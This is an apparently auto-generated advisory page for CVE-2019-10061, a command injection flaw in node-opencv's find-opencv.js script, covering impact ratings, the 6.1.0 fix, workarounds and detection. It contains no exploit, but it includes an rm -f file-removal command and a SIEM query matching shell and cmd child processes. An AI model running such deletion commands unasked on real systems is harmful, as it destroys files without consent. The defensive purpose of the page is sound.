Login Sign Up

CVE-2019-10061

9.8 CRITICAL
Remote Code Execution

📋 TL;DR

CVE-2019-10061 is a command injection vulnerability in node-opencv's utils/find-opencv.js script that allows attackers to execute arbitrary system commands by manipulating user input. This affects all users of node-opencv versions prior to 6.1.0 who use the vulnerable script. The high CVSS score of 9.8 reflects the potential for complete system compromise.

💻 Affected Systems

Products:
  • node-opencv (OpenCV bindings for Node.js)
Versions: All versions prior to 6.1.0
Operating Systems: All platforms where Node.js runs (Linux, Windows, macOS)
Default Config Vulnerable: ⚠️ Yes
Notes: The vulnerability exists in the utils/find-opencv.js script which may be used during OpenCV detection/configuration.

📦 What is this software?

Node Opencv by Node Opencv Project

View all CVEs affecting Node Opencv →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete system takeover with root/admin privileges, data exfiltration, ransomware deployment, or use as a pivot point for lateral movement.

🟠

Likely Case

Arbitrary command execution with the privileges of the Node.js process, potentially leading to data theft, service disruption, or installation of backdoors.

🟢

If Mitigated

Limited impact if the vulnerable script is not used or if input validation prevents exploitation, though the vulnerability remains present.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploitation requires the ability to control input to the vulnerable script, which could occur through various application entry points.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 6.1.0 and later

Vendor Advisory: https://www.npmjs.com/advisories/789

Restart Required: Yes

Instructions:

1. Update node-opencv to version 6.1.0 or later using npm update opencv. 2. Restart any Node.js applications using the library. 3. Verify the update with npm list opencv.

🔧 Temporary Workarounds

Input Validation/Sanitization

all

Implement strict input validation and sanitization for any user input passed to the find-opencv.js script.

Script Removal/Restriction

linux

Remove or restrict execution of the vulnerable utils/find-opencv.js script if not required.

rm -f node_modules/opencv/utils/find-opencv.js

🧯 If You Can't Patch

  • Implement strict input validation and sanitization for all user inputs
  • Run Node.js applications with minimal privileges and in isolated environments

🔍 How to Verify

Check if Vulnerable:

Check if node-opencv version is below 6.1.0 using npm list opencv or check package.json.

Check Version:

npm list opencv | grep opencv

Verify Fix Applied:

Confirm node-opencv version is 6.1.0 or higher and that the utils/find-opencv.js file contains proper input validation.

📡 Detection & Monitoring

Log Indicators:

  • Unusual command execution patterns from Node.js processes
  • Suspicious child process spawning

Network Indicators:

  • Unexpected outbound connections from Node.js applications

SIEM Query:

process.name:node AND (process.args:*find-opencv* OR process.args:*cmd* OR process.args:*sh*)

📊 Metadata

CVE ID: CVE-2019-10061
CVSS v3 Score: 9.8 (CRITICAL)
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-78
Published: March 26, 2019
Last Updated: November 21, 2024

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2019-10061, you might also want to check these:

CVE-2023-2564 10.0

This CVE describes an OS command injection vulnerability in scanservjs web scanning software that al...

Same vulnerability type (CWE-78)
CVE-2024-58338 10.0

Anevia Flamingo XL 3.2.9 contains a restricted shell escape vulnerability that allows remote attacke...

Same vulnerability type (CWE-78)
CVE-2025-26389 10.0

This critical vulnerability allows unauthenticated remote attackers to execute arbitrary code with r...

Same vulnerability type (CWE-78)